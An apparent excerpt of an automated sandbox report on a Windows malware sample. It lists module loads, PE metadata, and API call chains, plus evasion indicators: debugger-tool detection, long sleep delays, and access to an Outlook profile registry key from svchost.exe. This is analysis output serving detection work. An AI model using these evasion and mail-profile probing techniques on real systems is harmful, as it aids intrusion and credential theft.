              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: lsc5QN46NH.exeStatic file information: File size 80740352 > 1048576
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: lsc5QN46NH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
              Source: lsc5QN46NH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: lsc5QN46NH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: lsc5QN46NH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: lsc5QN46NH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: lsc5QN46NH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00604B37 LoadLibraryA,GetProcAddress,0_2_00604B37
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00628945 push ecx; ret 0_2_00628958
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_078626B8 push eax; iretd 2_2_078626B9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786E558 push eax; iretd 2_2_0786E559
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_07865CAB pushfd ; iretd 2_2_07865CB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_07862BB3 pushfd ; iretd 2_2_07862BB9
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006048D7
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00685376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00685376
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00623187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00623187
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeAPI/Special instruction interceptor: Address: 1644F94
              Source: lsc5QN46NH.exe, 00000000.00000003.1480609566.00000000014F0000.00000004.00000020.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000002.1516190225.00000000014F0000.00000004.00000020.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1480517098.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEVC
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7340000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599297Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599187Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599077Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598968Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598859Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598745Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598640Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598421Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596338Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595578Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595468Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595140Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594921Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594374Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594265Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1640Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 8221Jump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102260
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeAPI coverage: 4.6 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -23058430092136925s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 2948Thread sleep count: 1640 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -599422s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -599297s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 2948Thread sleep count: 8221 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -599187s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -599077s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598968s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598859s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598745s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598640s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598421s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598312s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -598093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597546s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597328s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597218s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -597000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596338s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -596015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595578s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595468s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595359s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595140s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -595031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594921s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594593s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594374s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594265s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5512Thread sleep time: -594156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0066445A
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066C6D1 FindFirstFileW,FindClose,0_2_0066C6D1
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066C75C
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066EF95
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F0F2
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066F3F3
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006637EF
